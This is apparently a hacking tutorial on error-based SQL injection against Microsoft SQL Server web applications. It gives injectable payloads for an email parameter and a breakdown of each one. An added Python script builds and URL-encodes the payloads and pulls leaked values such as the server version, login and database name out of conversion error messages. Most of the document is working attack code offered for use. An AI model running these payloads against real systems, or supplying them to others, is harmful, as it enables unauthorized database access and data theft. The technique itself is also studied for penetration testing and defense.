Error based SQL Injection with WAF bypass manual Exploit 100%

Hands On

Picking Function

email=qaramany'
  • SUSER_NAME()
  • USER_NAME()
  • PERMISSIONS()
  • DB_NAME()
  • FILE_NAME()
  • TYPE_NAME()
  • COL_NAME()
qaramany'%2buser_name(@@version)--
This payload returns the database version. USER_NAME() expects an integer ID, so the server tries to convert the string returned by @@version to int, fails, and echoes the offending value in the conversion error message. Breaking the payload down:
  • qaramany : the original parameter value (the author's name)
  • ' : single quote that closes the string literal, so everything after it is parsed as SQL
  • %2b : URL encoding for +, the MSSQL string concatenation operator (a bare + in a query string is decoded as a space, which breaks the payload)
  • user_name() : a function call that triggers a data type conversion error on the sought-after data, either by passing it a string directly or by wrapping the target in CONVERT(int, ...)
  • -- : comments out the remainder of the original query
qaramany'%2buser_name(convert(int,(SYSTEM_USER)))--
qaramany'%2buser_name(convert(int,(SESSION_USER)))--
qaramany'%2buser_name(UPPER('sql+tutorial+is+fun!'))--
qaramany'%2buser_name(IIF(5=4,+'YES',+'HackedBy_c0nqr0r&0x4m'))--
qaramany'%2buser_name(convert(int,(db_name())))--
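The payloads above are built and read back by hand. As an added example (not code from the original post), the script below automates the two mechanical parts of the technique: URL-encoding the payload so that the + concatenation operator survives as %2B (and a literal & does not terminate the parameter), and pulling the leaked value out of the MSSQL conversion error text. The parameter name, the prefix value "qaramany" and the sample error messages are constructed for the demonstration; the error wording is the standard MSSQL "Conversion failed when converting the ... value '...' to data type int." message.

```python
import re
from urllib.parse import quote

# MSSQL echoes the value it could not convert inside the error message.
# Matches "char", "varchar" and "nvarchar" variants of the message.
CONVERSION_ERROR = re.compile(
    r"Conversion failed when converting the (?:n?var)?char value "
    r"'(?P<leak>.*?)' to data type int\.",
    re.DOTALL,
)

# Expressions whose string result we want reflected in the error.
# Names are labels chosen here, not part of the original post.
TARGETS = {
    "version": "@@version",                       # implicit string->int conversion
    "login": "convert(int,(SYSTEM_USER))",        # explicit CONVERT, same effect
    "user": "convert(int,(SESSION_USER))",
    "database": "convert(int,(db_name()))",
}


def build_payload(prefix: str, expression: str) -> str:
    """Raw (not yet URL-encoded) value for the injected parameter.

    ' closes the string literal, + concatenates the injected expression,
    USER_NAME() forces an int conversion, -- drops the rest of the query.
    """
    return f"{prefix}'+user_name({expression})--"


def encode_for_query_string(payload: str) -> str:
    """Percent-encode the payload for use in a URL query string.

    '+' becomes %2B (a bare '+' decodes to a space) and '&' becomes %26
    (a bare '&' would start a new parameter). Quotes, parentheses, '@'
    and ',' are left readable, as in the hand-written payloads.
    """
    return quote(payload, safe="()'@,=!")


def payloads_for(prefix: str = "qaramany") -> dict:
    """All target payloads, ready to drop into email=<value>."""
    return {name: encode_for_query_string(build_payload(prefix, expr))
            for name, expr in TARGETS.items()}


def extract_leak(error_text: str):
    """Return the value MSSQL reflected in a conversion error, or None."""
    match = CONVERSION_ERROR.search(error_text)
    return match.group("leak") if match else None


if __name__ == "__main__":
    for name, value in payloads_for().items():
        print(f"{name:9} email={value}")

    # Constructed sample responses, as the application might reflect them.
    samples = [
        "Conversion failed when converting the nvarchar value "
        "'Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)' to data type int.",
        "Conversion failed when converting the nvarchar value 'sa' to data type int.",
        "Incorrect syntax near 'x'.",  # a syntax error leaks nothing useful
    ]
    for text in samples:
        print("leak:", extract_leak(text))
```

The encoder deliberately leaves the single quote bare, matching the page's payloads; a WAF that keys on %27 will see the same request either way, since the server decodes both forms identically. If you pass a string containing & (as in the IIF payload), run it through encode_for_query_string first or the parameter will be cut off at the ampersand.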
